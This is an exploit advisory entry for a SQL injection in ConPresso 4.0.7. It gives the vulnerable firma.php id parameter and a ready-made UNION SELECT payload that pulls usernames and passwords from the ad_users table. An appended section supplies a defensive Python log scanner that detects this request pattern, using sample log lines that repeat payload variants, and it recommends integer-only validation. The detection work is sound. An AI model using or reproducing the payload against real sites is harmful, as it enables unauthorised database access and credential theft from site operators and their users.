ConPresso 4.0.7 - SQL Injection

EDB-ID: 12684
Author: Gamoscu
Type: webapps
Platform: PHP
Date: 2010-05-21

ConPresso 4.0.7 SQL Injection  Vulnerability  
    
########################### 
    
Author    : Gamoscu  
Homepage  : http://www.1923turk.com  
Blog      : http://gamoscu.wordpress.com/  
Script    : ConPresso 4.0.7 
Download  : http://www.conpresso.de/conpresso/de_downloads/index.php?rubric=Download
    
###########################   
      
[ Vulnerable File ] 
  
firma.php?id= [ SQL ] 
       
  
[ XpL ] 
    
-1/**/union/**/all/**/select/**/1,concat_ws(0x3a,password,username),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+ad_users 
  
  
    

Happy birthday, DELiBEY

     
##############################################################   
# Greetz: Manas58 - Baybora - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO   
##############################################################
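
A defender-side check for the request pattern shown under [ XpL ], as an added example that is not part of the original advisory: it scans web access logs for firma.php requests whose id is not a plain integer, decoding percent-encoding, '+' and /**/ comments before matching. The access-log format, the sample lines (with an abbreviated column list) and the assumption that legitimate id values are plain integers are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_COMMENT = re.compile(r"/\*.*?\*/", re.S)   # /**/ used in place of spaces
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)

def classify_id(value):
    """Classify one decoded id value: 'ok', 'non-numeric' or 'union-select'."""
    flattened = SQL_COMMENT.sub(" ", value)
    if UNION_SELECT.search(flattened):
        return "union-select"
    # Assumption: legitimate ids are plain decimal integers.
    return "ok" if re.fullmatch(r"\d+", value) else "non-numeric"

def scan(lines, script="firma.php"):
    """Return (client, verdict) for every suspicious id sent to `script`."""
    findings = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/" + script):
            continue
        # parse_qs percent-decodes and turns '+' into a space.
        for value in parse_qs(url.query, keep_blank_values=True).get("id", []):
            verdict = classify_id(value)
            if verdict != "ok":
                findings.append((client, verdict))
    return findings

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [21/May/2010:09:00:01 +0000] "GET /firma.php?id=12 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [21/May/2010:09:00:05 +0000] "GET /firma.php?id=-1/**/union/**/all/**/select/**/1,2+from+ad_users HTTP/1.1" 200 911',
    '198.51.100.7 - - [21/May/2010:09:00:09 +0000] "GET /firma.php?id=-1%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F1 HTTP/1.1" 200 903',
    '203.0.113.4 - - [21/May/2010:09:01:00 +0000] "GET /firma.php?id=12abc HTTP/1.1" 200 40',
    '203.0.113.4 - - [21/May/2010:09:01:02 +0000] "GET /index.php?id=7 HTTP/1.1" 200 3000',
]

if __name__ == "__main__":
    for client, verdict in scan(SAMPLE_LOG):
        print(client, verdict)
```

The same integer-only rule, enforced in the application before the value reaches the query, is what closes the hole; the log scan only shows who has been probing it.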